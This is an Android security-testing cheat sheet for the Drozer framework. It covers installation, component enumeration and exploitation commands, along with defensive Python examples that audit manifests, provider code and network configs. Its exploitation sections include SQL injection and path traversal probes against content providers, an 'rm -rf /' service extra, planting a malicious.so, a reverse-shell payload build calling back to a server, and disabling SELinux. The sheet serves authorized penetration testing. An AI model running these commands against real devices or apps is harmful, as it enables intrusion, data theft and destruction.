
Drozer Cheat Sheet

Overview

Drozer is a comprehensive security testing framework for Android applications. It lets you take on the role of an Android app and interact with the Dalvik VM, the IPC endpoints of other apps and the underlying operating system. Drozer provides tools for the remote exploitation of Android devices through malicious applications and for a complete security assessment of Android applications.

⚠️ Warning: Use Drozer only on devices and applications that you own or that you have explicit permission to test. Unauthorized use may violate terms of service or local laws.

Installation

Prerequisites

# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc

Installation on Linux

# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl

# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install

Installation on macOS

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

Installation on Windows

# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/

Android Device Setup

# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging

# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk

# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON

# Forward port for communication
adb forward tcp:31415 tcp:31415

Basic Usage

Connecting to the Device

# Connect to Drozer agent
drozer console connect

# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to specific device
drozer console connect --device <device_id>

Basic Commands

# List available modules
dz> list

# Get help for specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

Package Analysis

Package Information

# List all packages
dz> run app.package.list

# List packages with filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions (the info output includes "Uses Permissions" by default)
dz> run app.package.info -a com.example.app

# Find packages that hold a specific permission
dz> run app.package.list -p android.permission.INTERNET

# Find packages that define a specific (custom) permission
dz> run app.package.list -d com.example.permission.CUSTOM

# Summarise the exported attack surface of a package
dz> run app.package.attacksurface com.example.app

# Dump the AndroidManifest.xml of a package
dz> run app.package.manifest com.example.app

Application Components

# List exported activities (the info modules list exported components by default)
dz> run app.activity.info -a com.example.app

# Include unexported activities
dz> run app.activity.info -a com.example.app -u

# List exported services
dz> run app.service.info -a com.example.app

# Include unexported services
dz> run app.service.info -a com.example.app -u

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app

# Include unexported broadcast receivers
dz> run app.broadcast.info -a com.example.app -u

# List exported content providers
dz> run app.provider.info -a com.example.app

# Include unexported content providers
dz> run app.provider.info -a com.example.app -u
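The component listings above are derived from the app's manifest. As an added example (not part of the original cheat sheet and not Drozer code), the Python script below applies Android's export rule to a constructed AndroidManifest.xml and reports the same attack surface that `app.package.attacksurface` summarises, plus which exported components require no permission at all; the manifest, package name and component names are made up for the demonstration.

```python
"""Reproduce, from a manifest, what app.activity.info / app.package.attacksurface
report: which components are exported, and which exported ones need no permission."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest; not taken from any real application.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="true"/>
    <activity android:name=".InternalActivity"/>
    <service android:name=".BackgroundService" android:exported="true"
        android:permission="com.example.app.permission.BIND"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <provider android:name=".DataProvider" android:authorities="com.example.provider"
        android:exported="true"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem):
    """Android's rule: an explicit android:exported wins; otherwise a component is
    exported exactly when it declares an <intent-filter>. (Providers on
    targetSdk < 17 default to exported; this helper applies the modern rule.)"""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return elem.find("intent-filter") is not None


def attack_surface(manifest_xml):
    """Return {tag: [(fully qualified name, required permission or None), ...]}
    for every exported component, in manifest order."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    app = root.find("application")
    surface = {tag: [] for tag in COMPONENT_TAGS}
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            if not is_exported(comp):
                continue
            name = _attr(comp, "name")
            if name.startswith("."):          # relative names are resolved against the package
                name = package + name
            surface[tag].append((name, _attr(comp, "permission")))
    return surface


def unprotected(surface):
    """Exported components reachable by any app on the device without a permission."""
    return sorted(name for comps in surface.values() for name, perm in comps if perm is None)


if __name__ == "__main__":
    s = attack_surface(SAMPLE_MANIFEST)
    for tag, comps in s.items():
        print("%d %s(s) exported" % (len(comps), tag))
    for name in unprotected(s):
        print("  reachable without a permission:", name)
```

Components that show up in `unprotected()` are the ones worth probing first with `app.activity.start`, `app.service.start`, `app.broadcast.send` and `app.provider.query`, and the ones a developer should either mark `android:exported="false"` or guard with a signature-level permission.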

Activity Testing

Activity Enumeration

# Find exported activities in a package
dz> run app.activity.info -a com.example.app

# Include unexported activities
dz> run app.activity.info -a com.example.app -u

# Show the intent filters of each activity
dz> run app.activity.info -a com.example.app -i

# Filter activities by name
dz> run app.activity.info -a com.example.app -f Main

# Find activities that can be launched from a browser (BROWSABLE category)
dz> run scanner.activity.browsable -a com.example.app

Activity Exploitation

# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true

Service Testing

Service Enumeration

# List exported services in a package
dz> run app.service.info -a com.example.app

# Include unexported services
dz> run app.service.info -a com.example.app -u

# Show the intent filters of each service
dz> run app.service.info -a com.example.app -i

Service Exploitation

# Start a service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start a service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send a Messenger message to a bound service (--msg takes what, arg1 and arg2)
dz> run app.service.send com.example.app com.example.BackgroundService --msg 1 0 0 --extra string action "backup_data"

# Stop a service
dz> run app.service.stop --component com.example.app com.example.BackgroundService

Content Provider Testing

Content Provider Enumeration

# List exported content providers
dz> run app.provider.info -a com.example.app

# Include unexported content providers
dz> run app.provider.info -a com.example.app -u

# Find content URIs referenced by a package (the argument is a package name)
dz> run app.provider.finduri com.example.app

# Scan for content URIs that can actually be queried
dz> run scanner.provider.finduris -a com.example.app

Content Provider Exploitation

# Query content provider
dz> run app.provider.query content://com.example.provider/users

# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
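The `--selection` and `../` probes above only succeed when the provider forwards caller-controlled strings unchecked into SQLite or the file system. The Python script below is an added illustration (not Drozer code and not any real app's provider): it models a provider's `query()` and `openFile()` with an in-memory SQLite table and plain path handling, placing the vulnerable form beside the hardened one. The table rows, column names and the base directory are constructed for the example.

```python
"""Vulnerable vs hardened handling of a ContentProvider's selection string and file path."""
import os
import re
import sqlite3


def build_db():
    """In-memory users table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2"), ("bob", "passw0rd")])
    return db


# --- query(): the selection string -----------------------------------------

def query_vulnerable(db, selection, selection_args=()):
    """Mimics db.query(TABLE, null, selection, selectionArgs, ...) where the raw
    selection is concatenated into the SQL: the caller controls the WHERE clause,
    so "username='admin' OR '1'='1'" returns every row."""
    return db.execute("SELECT username FROM users WHERE " + selection, selection_args).fetchall()


ALLOWED_COLUMNS = {"id", "username"}          # columns a caller may filter on
SELECTION_RE = re.compile(r"^(\w+)\s*=\s*\?$")  # only "column = ?" with a bound value


def query_hardened(db, selection, selection_args=()):
    """Accept only an allow-listed 'column = ?' selection and bind the value; the
    same effect as SQLiteQueryBuilder.setStrict(true) plus a projection map."""
    m = SELECTION_RE.match(selection or "")
    if not m or m.group(1) not in ALLOWED_COLUMNS or len(selection_args) != 1:
        raise ValueError("rejected selection: %r" % (selection,))
    return db.execute("SELECT username FROM users WHERE %s = ?" % m.group(1), selection_args).fetchall()


# --- openFile(): the URI path segment ----------------------------------------

def open_file_vulnerable(base_dir, requested):
    """Joins the URI path segment onto the files directory without checking where
    the result ends up, so '..' segments escape the directory."""
    return os.path.normpath(os.path.join(base_dir, requested))


def open_file_hardened(base_dir, requested):
    """Canonicalise the result and require that it is still inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes provider directory: %r" % (requested,))
    return target


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", query_vulnerable(db, "username='admin' OR '1'='1'"))
    print("hardened:  ", query_hardened(db, "username = ?", ("admin",)))
    base = "/data/data/com.example.app/files"   # constructed provider directory
    print("vulnerable:", open_file_vulnerable(base, "../../../../etc/hosts"))
    try:
        open_file_hardened(base, "../../../../etc/hosts")
    except PermissionError as e:
        print("hardened:  ", e)
```

The hardened `query()` deliberately refuses anything other than `column = ?` on an allow-list, which is what makes a Drozer `--selection "username='admin' OR '1'='1'"` probe fail; `scanner.provider.injection` and `scanner.provider.traversal` automate the two probes across every accessible URI of a package.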

Broadcast Receiver Testing

Broadcast Receiver Enumeration

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app

# Include unexported broadcast receivers
dz> run app.broadcast.info -a com.example.app -u

# Show the intent filters of each receiver (e.g. android.intent.action.BOOT_COMPLETED)
dz> run app.broadcast.info -a com.example.app -i

Broadcast Receiver Exploitation

# Send a broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send a broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send a protected system broadcast (the system rejects it from non-system senders; a receiver that still trusts the action is the finding)
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Target a specific receiver explicitly, bypassing its intent filter
dz> run app.broadcast.send --component com.example.app com.example.BootReceiver --action com.example.CUSTOM_ACTION

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true

File System Analysis

File System Enumeration

# List application files (the agent only sees what its own uid is allowed to read)
dz> run shell.exec "ls -la /data/data/com.example.app/"

# Find world-readable files
dz> run scanner.misc.readablefiles /data/data/com.example.app/

# Find world-writable files
dz> run scanner.misc.writablefiles /data/data/com.example.app/

# Search for files matching a pattern
dz> run shell.exec "find /data/data/com.example.app/ -name '*.db'"

# Get the size and MD5 hash of a file
dz> run tools.file.size /data/data/com.example.app/databases/app.db
dz> run tools.file.md5sum /data/data/com.example.app/databases/app.db

File System Exploitation

# Read file contents
dz> run shell.exec "cat /data/data/com.example.app/shared_prefs/config.xml"

# Download a file from the device
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# Upload a file to the device (only succeeds where the agent's uid may write)
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

# Create a symbolic link (only where the agent's uid may write)
dz> run shell.exec "ln -s /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt"

# Change file permissions (only on files owned by the agent's uid)
dz> run shell.exec "chmod 777 /data/data/com.example.app/config.txt"

Database Analysis

SQLite Database Testing

# Find SQLite databases
dz> run shell.exec "find /data/data/com.example.app/ -name '*.db'"

# List the SQL tables reachable through the package's content providers
dz> run scanner.provider.sqltables -a com.example.app

# Download the database for offline analysis
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# List tables (run locally with the sqlite3 CLI)
sqlite3 /tmp/app.db ".tables"

# Query the database
sqlite3 /tmp/app.db "SELECT * FROM users;"

# Dump the database schema
sqlite3 /tmp/app.db ".schema"

# Export the whole database
sqlite3 /tmp/app.db ".dump" > /tmp/database_dump.sql

# Test content providers for SQL injection (automated scan, then a manual probe)
dz> run scanner.provider.injection -a com.example.app
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

Network Analysis

Network Configuration

# Find the APK path of the package ("Apk Path" in the output)
dz> run app.package.info -a com.example.app

# Download the APK so the compiled network security config can be inspected (example path)
dz> run tools.file.download /data/app/com.example.app-1/base.apk /tmp/base.apk

# Decode network_security_config.xml from the APK (run locally)
aapt dump xmltree /tmp/base.apk res/xml/network_security_config.xml

# Check the manifest for android:usesCleartextTraffic and android:networkSecurityConfig
dz> run app.package.manifest com.example.app

# List network interfaces
dz> run shell.exec "ip addr"

# Check for certificate pinning: look for <pin-set> entries in the decoded config
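Once the network security config has been decoded back to XML (for example with apktool), the settings worth flagging can be checked mechanically. The Python checker below is an added example, not part of Drozer or of the original page; the sample config, domain names and pin value are constructed, and the current date is passed in as a string so the pin-set expiry check is reproducible.

```python
"""Audit a decoded network_security_config.xml for cleartext traffic, trust in
user-installed CAs, missing pin-sets and expired pin-sets."""
import xml.etree.ElementTree as ET
from datetime import date

# Constructed sample config; not taken from any real application.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
  <base-config cleartextTrafficPermitted="true">
    <trust-anchors>
      <certificates src="system"/>
      <certificates src="user"/>
    </trust-anchors>
  </base-config>
  <domain-config cleartextTrafficPermitted="false">
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2023-01-01">
      <pin digest="SHA-256">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</pin>
    </pin-set>
  </domain-config>
  <domain-config>
    <domain>legacy.example.com</domain>
  </domain-config>
</network-security-config>
"""


def audit_network_security_config(xml_text, today="2024-06-01"):
    """Return a list of (scope, finding) tuples; an empty list means nothing was flagged.
    `today` is an ISO date string used for the pin-set expiry check."""
    today = date.fromisoformat(today)
    root = ET.fromstring(xml_text)
    findings = []

    base = root.find("base-config")
    base_cleartext = base is not None and base.get("cleartextTrafficPermitted", "false").lower() == "true"
    if base_cleartext:
        findings.append(("base-config", "cleartext traffic permitted for all domains"))
    if base is not None:
        for cert in base.findall("trust-anchors/certificates"):
            if cert.get("src") == "user":
                findings.append(("base-config", "user-installed CAs are trusted (interception-friendly)"))

    for dc in root.findall("domain-config"):
        domains = ", ".join(d.text.strip() for d in dc.findall("domain"))
        # A domain-config without its own setting inherits the base-config value.
        cleartext = dc.get("cleartextTrafficPermitted", str(base_cleartext)).lower() == "true"
        if cleartext:
            findings.append((domains, "cleartext traffic permitted"))
        pin_set = dc.find("pin-set")
        if pin_set is None:
            findings.append((domains, "no certificate pinning configured"))
        else:
            expiration = pin_set.get("expiration")
            if expiration and date.fromisoformat(expiration) < today:
                # After the expiration date Android stops enforcing the pins.
                findings.append((domains, "pin-set expired on %s; pins are no longer enforced" % expiration))
    return findings


if __name__ == "__main__":
    for scope, finding in audit_network_security_config(SAMPLE_CONFIG):
        print("[%s] %s" % (scope, finding))
```

Each finding maps to a Drozer-side test: cleartext permission and user-CA trust are what make traffic interception with a proxy succeed, and a missing or expired pin-set means the app relies on the platform trust store alone.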

SSL/TLS Testing

# Drozer has no TLS scanner of its own; enumerate native libraries that may carry a bundled TLS stack
dz> run scanner.misc.native -a com.example.app

# Check whether the app is debuggable (a debugger can then tamper with TLS handling at runtime)
dz> run app.package.debuggable -f com.example.app

# Check the manifest for networkSecurityConfig / usesCleartextTraffic, then inspect trust anchors and pin-set entries in the decoded config
dz> run app.package.manifest com.example.app

Advanced Exploitation

Custom Module Development

# Create a custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
# The module name is the "path" list plus the lower-cased class name, so this module is run as custom.exploit.
# Register the directory once with "module repository create ~/.drozer_modules" in the console.

from drozer.modules import common, Module

class Exploit(Module, common.FileSystem, common.PackageManager):

    name = "Custom Exploit Module"
    description = "Custom exploitation module"
    examples = "run custom.exploit -a com.example.app"
    author = "Security Researcher"
    date = "2024-01-01"
    license = "BSD (3 clause)"
    path = ["custom"]

    def add_arguments(self, parser):
        parser.add_argument("-a", "--package", help="target package")

    def execute(self, arguments):
        if arguments.package:
            self.stdout.write("Exploiting package: %s\n" % arguments.package)
            # Custom exploitation logic here
        else:
            self.stdout.write("Please specify target package\n")

Payload Generation

# Payloads are built from the host shell, not from the dz> console
# List the available payloads and packaged exploits
drozer payload list
drozer exploit list

# Build a weasel reverse shell payload that connects back to a drozer server
drozer payload build weasel.shell.armeabi --server 192.168.1.100:31415

# Build a drozer agent APK that connects back to a server instead of listening
drozer agent build --server 192.168.1.100:31415

# Start a drozer server on the host to receive the connection
drozer server start --port 31415

Privilege Escalation

# Install busybox on the device to get a fuller toolset
dz> run tools.setup.busybox

# Prepare a minimal su binary (only usable if the device is already rooted)
dz> run tools.setup.minimalsu

# Find setuid/setgid binaries
dz> run scanner.misc.sflagbinaries

# Check for an open JDWP debug port (debuggable apps)
dz> run exploit.jdwp.check

# Test content providers for directory traversal
dz> run scanner.provider.traversal -a com.example.app

Automation Scripts

Complete Assessment Script

#!/usr/bin/env python3
# Drive the drozer console from a script using "drozer console connect -c COMMAND"

import json
import subprocess
import sys


class DrozerAutomation:
    def __init__(self, package_name):
        self.package = package_name
        self.results = {}

    def run_drozer_command(self, command):
        """Execute a single Drozer command and return its output."""
        try:
            cmd = ["drozer", "console", "connect", "-c", command]
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return output.decode("utf-8")
        except subprocess.CalledProcessError as e:
            return f"Error: {e.output.decode('utf-8')}"

    def analyze_package(self):
        """Collect package information and the full (exported and unexported) component lists."""
        print(f"[+] Analyzing package: {self.package}")
        modules = {
            "package_info": f"run app.package.info -a {self.package}",
            "activities": f"run app.activity.info -a {self.package} -u",
            "services": f"run app.service.info -a {self.package} -u",
            "providers": f"run app.provider.info -a {self.package} -u",
            "receivers": f"run app.broadcast.info -a {self.package} -u",
        }
        for key, command in modules.items():
            self.results[key] = self.run_drozer_command(command)
        return self.results

    def test_exported_components(self):
        """List exported components (the info modules show exported ones by default)."""
        print("[+] Testing exported components")
        return {
            "exported_activities": self.run_drozer_command(f"run app.activity.info -a {self.package}"),
            "exported_services": self.run_drozer_command(f"run app.service.info -a {self.package}"),
            "exported_providers": self.run_drozer_command(f"run app.provider.info -a {self.package}"),
        }

    def test_content_providers(self):
        """Enumerate content URIs and scan which of them are accessible."""
        print("[+] Testing content providers")
        return {
            "uris": self.run_drozer_command(f"run app.provider.finduri {self.package}"),
            "accessible_uris": self.run_drozer_command(f"run scanner.provider.finduris -a {self.package}"),
        }

    def generate_report(self):
        """Write all results to a JSON report."""
        report = {
            "package": self.package,
            "analysis_results": self.results,
            "exported_components": self.test_exported_components(),
            "content_provider_tests": self.test_content_providers(),
        }
        report_file = f"{self.package}_security_report.json"
        with open(report_file, "w") as f:
            json.dump(report, f, indent=2)
        print(f"[+] Report saved: {report_file}")
        return report


# Usage
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 drozer_automation.py <package_name>")
        sys.exit(1)

    analyzer = DrozerAutomation(sys.argv[1])
    analyzer.analyze_package()
    analyzer.generate_report()

Batch Testing Script

#!/bin/bash
# Batch testing script for multiple packages (one package name per line in packages.txt)

PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"

mkdir -p "$RESULTS_DIR"

while IFS= read -r package; do
    echo "[+] Testing package: $package"

    # Create package-specific directory
    mkdir -p "$RESULTS_DIR/$package"

    # Run comprehensive tests (the info modules list exported components by default)
    drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
    drozer console connect -c "run app.activity.info -a $package" > "$RESULTS_DIR/$package/exported_activities.txt"
    drozer console connect -c "run app.service.info -a $package" > "$RESULTS_DIR/$package/exported_services.txt"
    drozer console connect -c "run app.provider.info -a $package" > "$RESULTS_DIR/$package/exported_providers.txt"
    drozer console connect -c "run app.broadcast.info -a $package" > "$RESULTS_DIR/$package/exported_receivers.txt"

    # Test content providers
    drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

    # Test for common vulnerabilities
    drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
    drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

    echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"

echo "[+] Batch testing completed"

Troubleshooting

Connection Problems

# Check that the Drozer agent is running (this launches it if it is not)
adb shell am start -n com.mwr.dz/.activities.MainActivity

# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415

# Restart the ADB server
adb kill-server
adb start-server

# Check device connectivity
adb devices

# Test the connection manually
telnet localhost 31415

Agent Problems

# Reinstall the Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk

# Check agent permissions
adb shell dumpsys package com.mwr.dz

# Enable the agent in the device settings
# Settings > Apps > Drozer Agent > Permissions

# Check whether the agent process is running
adb shell ps | grep drozer

Module Problems

# Register a local directory as a module repository (Drozer loads the modules it contains)
dz> module repository create ~/.drozer_modules

# Install custom modules by copying them into the repository, then reconnect so they are loaded
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/

# Check that the module is listed (filter by name)
dz> list custom

# Debug module loading
dz> help custom.module

Permission Problems

# Check required permissions
adb shell dumpsys package com.example.app | grep permission

# Grant a runtime permission manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

# Check SELinux status
adb shell getenforce

# Disable SELinux (rooted devices only; re-enable with "setenforce 1" afterwards)
adb shell su -c "setenforce 0"

Performance Problems

# Enable debug output to diagnose slow or failing modules
drozer console connect --debug

# Run a single command non-interactively instead of keeping a session open
drozer console connect -c "run app.package.list"

# Clear the cache
rm -rf ~/.drozer/cache/

# Use a specific device
drozer console connect --device <device_id>

Resources

- [Drozer by F-Secure Labs](https://labs.f-secure.com/tools/drozer/)

- [Drozer on GitHub](https://github.com/FSecureLABS/drozer)
- [Drozer User Guide (PDF)](https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf)
- [Android Penetration Testing Using Drozer (SecureLayer7)](https://blog.securelayer7.net/android-penetration-testing-using-drozer/)
- [OWASP Mobile Security Testing Guide](https://owasp.org/www-project-mobile-security-testing-guide/)
- [Android Security Tips](https://developer.android.com/training/articles/security-tips)
- [Official Drozer Documentation: Writing a Module](https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module)

This cheat sheet provides a complete reference for using Drozer in Android application security testing. Always make sure you have the appropriate authorization before testing any Android application or device.